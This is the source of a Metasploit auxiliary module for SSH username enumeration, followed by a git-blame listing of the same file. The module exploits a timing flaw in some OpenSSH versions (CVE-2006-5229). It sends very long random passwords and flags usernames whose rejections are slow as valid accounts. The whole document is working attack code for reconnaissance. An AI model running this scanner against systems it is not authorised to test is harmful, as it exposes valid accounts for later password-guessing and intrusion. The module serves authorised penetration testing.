metasploit-framework/modules/auxiliary/scanner/ssh/ssh_enumusers.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'net/ssh'

class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::CommandShell

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'SSH Username Enumeration',
      'Description' => %q{
        This module uses a time-based attack to enumerate users on an OpenSSH server.
        On some versions of OpenSSH under some configurations, OpenSSH will return a
        "permission denied" error for an invalid user faster than for a valid user.
      },
      'Author'      => ['kenkeiras'],
      'References'  =>
       [
         ['CVE',   '2006-5229'],
         ['OSVDB', '32721'],
         ['BID',   '20418']
       ],
      'License'     => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(22),
        OptPath.new('USER_FILE',
                    [true, 'File containing usernames, one per line', nil]),
        OptInt.new('THRESHOLD',
                   [true,
                   'Amount of seconds needed before a user is considered ' \
                   'found', 10])
      ], self.class
    )

    register_advanced_options(
      [
        OptInt.new('RETRY_NUM',
                   [true , 'The number of attempts to connect to a SSH server' \
                   ' for each user', 3]),
        OptInt.new('SSH_TIMEOUT',
                   [false, 'Specify the maximum time to negotiate a SSH session',
                   10]),
        OptBool.new('SSH_DEBUG',
                    [false, 'Enable SSH debugging output (Extreme verbosity!)',
                    false])
      ]
    )
  end

  def rport
    datastore['RPORT']
  end

  def retry_num
    datastore['RETRY_NUM']
  end

  def threshold
    datastore['THRESHOLD']
  end

  # Returns true if a nonsense username appears active.
  def check_false_positive(ip)
    user = Rex::Text.rand_text_alphanumeric(8)
    result = attempt_user(user, ip)
    return(result == :success)
  end

  def check_user(ip, user, port)
    pass = Rex::Text.rand_text_alphanumeric(64_000)

    opt_hash = {
      :auth_methods  => ['password', 'keyboard-interactive'],
      :msframework   => framework,
      :msfmodule     => self,
      :port          => port,
      :disable_agent => true,
      :password      => pass,
      :config        => false,
      :proxies       => datastore['Proxies']
    }

    opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

    start_time = Time.new

    begin
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        Net::SSH.start(ip, user, opt_hash)
      end
    rescue Rex::ConnectionError, Rex::AddressInUse
      return :connection_error
    rescue Net::SSH::Disconnect, ::EOFError
      return :success
    rescue ::Timeout::Error
      return :success
    rescue Net::SSH::Exception
    end

    finish_time = Time.new

    if finish_time - start_time > threshold
      :success
    else
      :fail
    end
  end

  def do_report(ip, user, port)
    report_auth_info(
      :host   => ip,
      :port   => rport,
      :sname  => 'ssh',
      :user   => user,
      :active => true
    )
  end

  # Because this isn't using the AuthBrute mixin, we don't have the
  # usual peer method
  def peer(rhost=nil)
    "#{rhost}:#{rport} - SSH -"
  end

  def user_list
    if File.readable? datastore['USER_FILE']
      File.new(datastore['USER_FILE']).read.split
    else
      raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"
    end
  end

  def attempt_user(user, ip)
    attempt_num = 0
    ret = nil

    while attempt_num <= retry_num and (ret.nil? or ret == :connection_error)
      if attempt_num > 0
        Rex.sleep(2 ** attempt_num)
        print_debug "#{peer(ip)} Retrying '#{user}' due to connection error"
      end

      ret = check_user(ip, user, rport)
      attempt_num += 1
    end

    ret
  end

  def show_result(attempt_result, user, ip)
    case attempt_result
    when :success
      print_good "#{peer(ip)} User '#{user}' found"
      do_report(ip, user, rport)
    when :connection_error
      print_error "#{peer(ip)} User '#{user}' on could not connect"
    when :fail
      print_debug "#{peer(ip)} User '#{user}' not found"
    end
  end

  def run_host(ip)
    print_status "#{peer(ip)} Checking for false positives"
    if check_false_positive(ip)
      print_error "#{peer(ip)} throws false positive results. Aborting."
      return
    else
      print_status "#{peer(ip)} Starting scan"
      user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) }
    end
  end

end
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'net/ssh'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Auxiliary::Scanner`
			`include Msf::Auxiliary::Report`
			`include Msf::Auxiliary::CommandShell`

Fix up whitespace 'n' stuff 2014-04-23 15:00:34 +00:00			`def initialize(info = {})`
Fix missing comma Commas will be the death of me. 2014-04-23 15:08:37 +00:00			`super(update_info(info,`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`'Name' => 'SSH Username Enumeration',`
			`'Description' => %q{`
Deconflict #3310 and correct the description 2014-04-29 15:48:32 +00:00			`This module uses a time-based attack to enumerate users on an OpenSSH server.`
			`On some versions of OpenSSH under some configurations, OpenSSH will return a`
			`"permission denied" error for an invalid user faster than for a valid user.`
			`},`
			`'Author' => ['kenkeiras'],`
			`'References' =>`
			`[`
			`['CVE', '2006-5229'],`
			`['OSVDB', '32721'],`
			`['BID', '20418']`
			`],`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`'License' => MSF_LICENSE`
Fix up whitespace 'n' stuff 2014-04-23 15:00:34 +00:00			`))`
SSH user enumeration script 2014-03-28 15:23:48 +00:00
			`register_options(`
			`[`
Fix up whitespace 'n' stuff 2014-04-23 15:00:34 +00:00			`Opt::RPORT(22),`
Use OptPath for file path options 2014-04-18 19:56:17 +00:00			`OptPath.new('USER_FILE',`
Fix up whitespace 'n' stuff 2014-04-23 15:00:34 +00:00			`[true, 'File containing usernames, one per line', nil]),`
Change THRESHOLD into a datastore option 2014-04-18 19:18:48 +00:00			`OptInt.new('THRESHOLD',`
Fix up whitespace 'n' stuff 2014-04-23 15:00:34 +00:00			`[true,`
			`'Amount of seconds needed before a user is considered ' \`
			`'found', 10])`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`], self.class`
			`)`

			`register_advanced_options(`
			`[`
			`OptInt.new('RETRY_NUM',`
			`[true , 'The number of attempts to connect to a SSH server' \`
Fix up whitespace 'n' stuff 2014-04-23 15:00:34 +00:00			`' for each user', 3]),`
			`OptInt.new('SSH_TIMEOUT',`
			`[false, 'Specify the maximum time to negotiate a SSH session',`
			`10]),`
			`OptBool.new('SSH_DEBUG',`
			`[false, 'Enable SSH debugging output (Extreme verbosity!)',`
			`false])`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`]`
			`)`
			`end`

			`def rport`
			`datastore['RPORT']`
			`end`

			`def retry_num`
			`datastore['RETRY_NUM']`
			`end`

Change THRESHOLD into a datastore option 2014-04-18 19:18:48 +00:00			`def threshold`
			`datastore['THRESHOLD']`
			`end`
SSH user enumeration script 2014-03-28 15:23:48 +00:00
Add a false positive check 2014-04-29 15:07:42 +00:00			`# Returns true if a nonsense username appears active.`
			`def check_false_positive(ip)`
Light touchup on FP checker 2014-04-29 15:14:41 +00:00			`user = Rex::Text.rand_text_alphanumeric(8)`
Add a false positive check 2014-04-29 15:07:42 +00:00			`result = attempt_user(user, ip)`
			`return(result == :success)`
			`end`

SSH user enumeration script 2014-03-28 15:23:48 +00:00			`def check_user(ip, user, port)`
Password made pseudo-random instead of a bunnch of A's 2014-04-18 19:10:34 +00:00			`pass = Rex::Text.rand_text_alphanumeric(64_000)`
SSH user enumeration script 2014-03-28 15:23:48 +00:00
			`opt_hash = {`
			`:auth_methods => ['password', 'keyboard-interactive'],`
			`:msframework => framework,`
			`:msfmodule => self,`
			`:port => port,`
			`:disable_agent => true,`
			`:password => pass,`
			`:config => false,`
			`:proxies => datastore['Proxies']`
			`}`

			`opt_hash.merge!(:verbose => :debug) if datastore['SSH_DEBUG']`

			`start_time = Time.new`

			`begin`
			`::Timeout.timeout(datastore['SSH_TIMEOUT']) do`
Remove unnecesary ssh_socket variable 2014-04-18 19:46:51 +00:00			`Net::SSH.start(ip, user, opt_hash)`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`end`
			`rescue Rex::ConnectionError, Rex::AddressInUse`
			`return :connection_error`
			`rescue Net::SSH::Disconnect, ::EOFError`
			`return :success`
			`rescue ::Timeout::Error`
			`return :success`
			`rescue Net::SSH::Exception`
			`end`

			`finish_time = Time.new`

Change THRESHOLD into a datastore option 2014-04-18 19:18:48 +00:00			`if finish_time - start_time > threshold`
return is not needed when it's the last lifunction line 2014-04-22 20:18:50 +00:00			`:success`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`else`
return is not needed when it's the last lifunction line 2014-04-22 20:18:50 +00:00			`:fail`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`end`
			`end`

			`def do_report(ip, user, port)`
			`report_auth_info(`
Fix up whitespace 'n' stuff 2014-04-23 15:00:34 +00:00			`:host => ip,`
			`:port => rport,`
			`:sname => 'ssh',`
			`:user => user,`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`:active => true`
			`)`
			`end`

Add a peer method, elaborate desc and prints 2014-04-28 18:36:45 +00:00			`# Because this isn't using the AuthBrute mixin, we don't have the`
			`# usual peer method`
			`def peer(rhost=nil)`
			`"#{rhost}:#{rport} - SSH -"`
			`end`

SSH user enumeration script 2014-03-28 15:23:48 +00:00			`def user_list`
Add a peer method, elaborate desc and prints 2014-04-28 18:36:45 +00:00			`if File.readable? datastore['USER_FILE']`
			`File.new(datastore['USER_FILE']).read.split`
			`else`
			`raise ArgumentError, "Cannot read file #{datastore['USER_FILE']}"`
			`end`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`end`

			`def attempt_user(user, ip)`
			`attempt_num = 0`
			`ret = nil`

			`while attempt_num <= retry_num and (ret.nil? or ret == :connection_error)`
			`if attempt_num > 0`
Use Rex.sleep instead of select 2014-04-22 20:16:16 +00:00			`Rex.sleep(2 ** attempt_num)`
Add a peer method, elaborate desc and prints 2014-04-28 18:36:45 +00:00			`print_debug "#{peer(ip)} Retrying '#{user}' due to connection error"`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`end`

			`ret = check_user(ip, user, rport)`
			`attempt_num += 1`
			`end`
Fix up whitespace 'n' stuff 2014-04-23 15:00:34 +00:00
return is not needed when it's the last lifunction line 2014-04-22 20:18:50 +00:00			`ret`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`end`

			`def show_result(attempt_result, user, ip)`
			`case attempt_result`
			`when :success`
Add a peer method, elaborate desc and prints 2014-04-28 18:36:45 +00:00			`print_good "#{peer(ip)} User '#{user}' found"`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`do_report(ip, user, rport)`
			`when :connection_error`
Add a peer method, elaborate desc and prints 2014-04-28 18:36:45 +00:00			`print_error "#{peer(ip)} User '#{user}' on could not connect"`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`when :fail`
Add a peer method, elaborate desc and prints 2014-04-28 18:36:45 +00:00			`print_debug "#{peer(ip)} User '#{user}' not found"`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`end`
			`end`

			`def run_host(ip)`
Add a false positive check 2014-04-29 15:07:42 +00:00			`print_status "#{peer(ip)} Checking for false positives"`
			`if check_false_positive(ip)`
			`print_error "#{peer(ip)} throws false positive results. Aborting."`
			`return`
			`else`
Light touchup on FP checker 2014-04-29 15:14:41 +00:00			`print_status "#{peer(ip)} Starting scan"`
Add a false positive check 2014-04-29 15:07:42 +00:00			`user_list.each{ \|user\| show_result(attempt_user(user, ip), user, ip) }`
			`end`
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`end`
Fix up whitespace 'n' stuff 2014-04-23 15:00:34 +00:00
SSH user enumeration script 2014-03-28 15:23:48 +00:00			`end`